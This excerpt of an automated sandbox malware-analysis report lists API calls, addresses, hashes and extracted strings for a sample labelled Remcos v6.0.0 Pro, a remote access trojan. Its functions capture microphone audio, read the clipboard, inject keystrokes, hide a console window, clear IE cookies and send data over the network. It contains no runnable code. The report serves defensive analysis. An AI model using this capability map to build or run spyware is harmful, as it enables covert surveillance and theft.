                                                          • Opcode Fuzzy Hash: b79e0bacf68e79f56bbfbff6a95aeb92d11d955db7cfd18af0a5c0e52fbe5259
                                                          • Instruction Fuzzy Hash: 44C105B0D04249AFEF11DFA9C8417BEBBB4EF09314F04415AE544A7392C738D941CBA9
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00453013,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452DE6
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452E69
                                                          • __alloca_probe_16.LIBCMT ref: 00452EA1
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00453013,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452EFC
                                                          • __alloca_probe_16.LIBCMT ref: 00452F4B
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452F13
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452F8F
                                                          • __freea.LIBCMT ref: 00452FBA
                                                          • __freea.LIBCMT ref: 00452FC6
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                          • String ID:
                                                          • API String ID: 201697637-0
                                                          • Opcode ID: 636d8ee8978a4b28d28c899fe5287c94f7ea3d2e518637072967bc6aea0c1ce5
                                                          • Instruction ID: e285173fe66e9ab68cc8b5f7bb46492c032c90826bba7407019ac45f59d87ef3
                                                          • Opcode Fuzzy Hash: 636d8ee8978a4b28d28c899fe5287c94f7ea3d2e518637072967bc6aea0c1ce5
                                                          • Instruction Fuzzy Hash: E991D572E002169BDF208E64DA41AEFBBB5AF0A312F14055BFC05E7242D778DC48C768
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • _memcmp.LIBVCRUNTIME ref: 004448B3
                                                          • _free.LIBCMT ref: 00444924
                                                          • _free.LIBCMT ref: 0044493D
                                                          • _free.LIBCMT ref: 0044496F
                                                          • _free.LIBCMT ref: 00444978
                                                          • _free.LIBCMT ref: 00444984
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: 614205798ad6061f3d9420df6d0f7eb30440e43e095dda7afa9147f4421e103d
                                                          • Instruction ID: ce46d41f1d9e01bafc0896c2bb0d2adb680072b6a59d341745b23d3028246374
                                                          • Opcode Fuzzy Hash: 614205798ad6061f3d9420df6d0f7eb30440e43e095dda7afa9147f4421e103d
                                                          • Instruction Fuzzy Hash: 24B14975A012199FEB24DF18C884BAEB7B4FF49314F1045AEE849A7351D738AE90CF48
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: af4d639371690cb8637a3a63659cf8324f890a8ac4b6ebd8bb2dc9423f2fa13d
                                                          • Instruction ID: 641150f3fd0ea6af627c79cdc5c75230aa36f57d28899e04d0661f3c05bf373f
                                                          • Opcode Fuzzy Hash: af4d639371690cb8637a3a63659cf8324f890a8ac4b6ebd8bb2dc9423f2fa13d
                                                          • Instruction Fuzzy Hash: 0D71D1716083528FDB24CF1994846ABB7E0AF84746F14442FF885A7352E77CDE81CB8A
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E478), ref: 00448289
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047279C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448301
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727F0,000000FF,?,0000003F,00000000,?), ref: 0044832E
                                                          • _free.LIBCMT ref: 00448277
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 00448443
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: xE$xE
                                                          • API String ID: 1286116820-1741595589
                                                          • Opcode ID: 1f630aa574f8f032912558e332746922b811222e22d4e5e5c8fa9a473f36de46
                                                          • Instruction ID: 82a604bb7294b81f3f73b5ad664ce4632eb81d562d18d3de5c52697f85b56542
                                                          • Opcode Fuzzy Hash: 1f630aa574f8f032912558e332746922b811222e22d4e5e5c8fa9a473f36de46
                                                          • Instruction Fuzzy Hash: 43510871900219ABEB14EF698D819AE77BCEF44B14F1002AFF854A3291EF788D418B5C
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412D99
                                                            • Part of subcall function 00412A82: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412AF5
                                                            • Part of subcall function 00412A82: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412B24
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • RegCloseKey.ADVAPI32(TeFTeF,00466554,00466554,00466900,00466900,00000071), ref: 00412F09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                          • String ID: TeF$TeFTeF$NG$TG$TG
                                                          • API String ID: 3114080316-3278504382
                                                          • Opcode ID: 21c71a250b61d8481e14fb29f658506147abfbd5a14f52d08b2dadadcd8e3add
                                                          • Instruction ID: 217e792c851e8857c64f97df11b7492b8bc11e7bd79a931969a0b124146415da
                                                          • Opcode Fuzzy Hash: 21c71a250b61d8481e14fb29f658506147abfbd5a14f52d08b2dadadcd8e3add
                                                          • Instruction Fuzzy Hash: ED41A1316042005BD224F725D8A2AEF7395AFD0308F50843FF94A671E2EF7C5D4986AE
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00466454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                            • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                            • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: b78f9c0dad55f8f19791313ae5084cf2035b383ecf8786089be001690557f36c
                                                          • Instruction ID: 7eae26b3d9efd85ab9a821acf87acbbc445967fcd6ce231ca79d13f55b5b668b
                                                          • Opcode Fuzzy Hash: b78f9c0dad55f8f19791313ae5084cf2035b383ecf8786089be001690557f36c
                                                          • Instruction Fuzzy Hash: C631A4715083019FD210EF21DD459AFB7A8FB84755F40093EF9C6B21A1DF38AA48CB9A
                                                          APIs
                                                            • Part of subcall function 004125EB: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                            • Part of subcall function 004125EB: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                            • Part of subcall function 004125EB: RegCloseKey.KERNEL32(?), ref: 00412637
                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TeF
                                                          • API String ID: 1133728706-3101562037
                                                          • Opcode ID: f8e7fb648c548857668710dd0e9519a80c5674c84583f57a4e2fba272261da1f
                                                          • Instruction ID: 7ed93d3ebd4d115a7197ccd8f2df160251767479400bef64a6787df62d4369c8
                                                          • Opcode Fuzzy Hash: f8e7fb648c548857668710dd0e9519a80c5674c84583f57a4e2fba272261da1f
                                                          • Instruction Fuzzy Hash: 29215C31A1410966CB04F7B2CCA69EE7764AE94318F40013FA902771D2EF789A4986DE
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                          • waveInOpen.WINMM(00472AF8,000000FF,00472B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                          • waveInPrepareHeader.WINMM(00472AC0,00000020,00000000), ref: 00401A66
                                                          • waveInAddBuffer.WINMM(00472AC0,00000020), ref: 00401A75
                                                          • waveInStart.WINMM ref: 00401A81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID: dMG$|MG
                                                          • API String ID: 1356121797-1683252805
                                                          • Opcode ID: 77e1d5555118943626de1adf0eca28b59d42989bc3a47fc9702db746b9fc2c03
                                                          • Instruction ID: 140f40b68b7a2e7574469051551963e155d477b90c1392cdc23a62cf20397fe9
                                                          • Opcode Fuzzy Hash: 77e1d5555118943626de1adf0eca28b59d42989bc3a47fc9702db746b9fc2c03
                                                          • Instruction Fuzzy Hash: 52215C316002019BC725DF66EE1996A7BA6FB84710B00883EF50DE76B0DBF898C0CB5C
                                                          APIs
                                                          • AllocConsole.KERNEL32(004750FC), ref: 0041C0C4
                                                          • GetConsoleWindow.KERNEL32 ref: 0041C0CA
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041C0DD
                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041C102
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$Window$AllocOutputShow
                                                          • String ID: Remcos v$6.0.0 Pro$CONOUT$
                                                          • API String ID: 4067487056-3561919337
                                                          • Opcode ID: 51f71f4df576cdb042b408fdcee2c306aad9b55f4cf694b49fe88f2f6d88a06c
                                                          • Instruction ID: 9cd6404a4583bb7861016a5e8077681a34a6ce6b29b6da971a73374578d830bb
                                                          • Opcode Fuzzy Hash: 51f71f4df576cdb042b408fdcee2c306aad9b55f4cf694b49fe88f2f6d88a06c
                                                          • Instruction Fuzzy Hash: 750121B1A80304BADA10F7F19D4BF9976AC6B14B09F500426BA05A70C2EEB8A554462D
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D774,0043D774,?,?,?,00449DB1,00000001,00000001,1AE85006), ref: 00449BBA
                                                          • __alloca_probe_16.LIBCMT ref: 00449BF2
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449DB1,00000001,00000001,1AE85006,?,?,?), ref: 00449C40
                                                          • __alloca_probe_16.LIBCMT ref: 00449CD7
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449D3A
                                                          • __freea.LIBCMT ref: 00449D47
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • __freea.LIBCMT ref: 00449D50
                                                          • __freea.LIBCMT ref: 00449D75
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3864826663-0
                                                          • Opcode ID: 45550f184a61a9f8ddf17f24dc0c1f131df532b020593bc4805c091103afbf88
                                                          • Instruction ID: b9264d00d576e3e69c3e593975f72d59ef517f4fd458bc34bb1ef2c80a576446
                                                          • Opcode Fuzzy Hash: 45550f184a61a9f8ddf17f24dc0c1f131df532b020593bc4805c091103afbf88
                                                          • Instruction Fuzzy Hash: 3651F8B2A10206AFFB258F65DC82EBF77A9EB44754F15462EFC05DB240EB38DC409658
                                                          APIs
                                                          • SendInput.USER32 ref: 00418CFE
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418D26
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D4D
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D6B
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D8B
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418DB0
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418DD2
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418DF5
                                                            • Part of subcall function 00418CA7: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418CAD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InputSend$Virtual
                                                          • String ID:
                                                          • API String ID: 1167301434-0
                                                          • Opcode ID: 03d106074c487e793b96b2f05eb270ad55284c326fdeb905245ef2a17d2a5417
                                                          • Instruction ID: 141eef32e971302722b3407f09031bac5ba220a7556c2b6a6b809b2d6bbc12e7
                                                          • Opcode Fuzzy Hash: 03d106074c487e793b96b2f05eb270ad55284c326fdeb905245ef2a17d2a5417
                                                          • Instruction Fuzzy Hash: 2D318031258349A9E210DF65DC41FDFBBECAFC9B08F04080FB58457191EAA4858C87AB
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00415BDE
                                                          • EmptyClipboard.USER32 ref: 00415BEC
                                                          • CloseClipboard.USER32 ref: 00415BF2
                                                          • OpenClipboard.USER32 ref: 00415BF9
                                                          • GetClipboardData.USER32(0000000D), ref: 00415C09
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415C12
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415C1B
                                                          • CloseClipboard.USER32 ref: 00415C21
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID:
                                                          • API String ID: 2172192267-0
                                                          • Opcode ID: c3bbb9bbde72810014a30b189257db169a48326f431590227c3d1d8f527ca17d
                                                          • Instruction ID: 369576e1793333014f6cd695595c81a654a0099a6e7e621b1e9fba3c04e1709a
                                                          • Opcode Fuzzy Hash: c3bbb9bbde72810014a30b189257db169a48326f431590227c3d1d8f527ca17d
                                                          • Instruction Fuzzy Hash: EE0152322003009FC350BF71DC59AAE77A5AF80B42F00443FFD06A61A2EF35C949C659
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16
                                                          • String ID: a/p$am/pm$hD
                                                          • API String ID: 3509577899-3668228793
                                                          • Opcode ID: 44ea5ac924aea223c25ec6af7a156dea15db996b08b3c9c3fe5b3e61d2d79652
                                                          • Instruction ID: deb853d5fd6adf3918d69246e21912660bd894b39407ab32d9d7da7685977c7a
                                                          • Opcode Fuzzy Hash: 44ea5ac924aea223c25ec6af7a156dea15db996b08b3c9c3fe5b3e61d2d79652
                                                          • Instruction Fuzzy Hash: 1CD111719002069AFB289F68C9857BBB7B0FF06708F26415BE9019B355D33D9D81CB6B
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 1d80ecd898b2873860388bfd90a69a91c38572b88f559cfcb1da031a1a01905e
                                                          • Instruction ID: 0b2e84c71dbf843dbcc2e99f9f8dbab27ea7d8a4e4ef3fbdb467abc62f582456
                                                          • Opcode Fuzzy Hash: 1d80ecd898b2873860388bfd90a69a91c38572b88f559cfcb1da031a1a01905e
                                                          • Instruction Fuzzy Hash: E061E271D00244AFEB20DF69C842BAABBF4EB4A320F24407BED45EB251D734AD45DB58
                                                          APIs
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • _free.LIBCMT ref: 00444296
                                                          • _free.LIBCMT ref: 004442AD
                                                          • _free.LIBCMT ref: 004442CC
                                                          • _free.LIBCMT ref: 004442E7
                                                          • _free.LIBCMT ref: 004442FE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID: Z9D
                                                          • API String ID: 3033488037-3781130823
                                                          • Opcode ID: 1e396c4f324de9ddb7b01a7129941a49517c4d4e7f7401902ff7e7d19c1db4b4
                                                          • Instruction ID: 86c8eacfe83d9672290f1135950403671a27bde0e5aa55c461cabd1b4ee88ac5
                                                          • Opcode Fuzzy Hash: 1e396c4f324de9ddb7b01a7129941a49517c4d4e7f7401902ff7e7d19c1db4b4
                                                          • Instruction Fuzzy Hash: D551B171A00304AFEB20DF6AC881B6A77F4FF95724B1446AEF809D7650E779DA01CB48
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044AA48,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A315
                                                          • __fassign.LIBCMT ref: 0044A390
                                                          • __fassign.LIBCMT ref: 0044A3AB
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A3D1
                                                          • WriteFile.KERNEL32(?,00000000,00000000,0044AA48,00000000,?,?,?,?,?,?,?,?,?,0044AA48,?), ref: 0044A3F0
                                                          • WriteFile.KERNEL32(?,?,00000001,0044AA48,00000000,?,?,?,?,?,?,?,?,?,0044AA48,?), ref: 0044A429
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
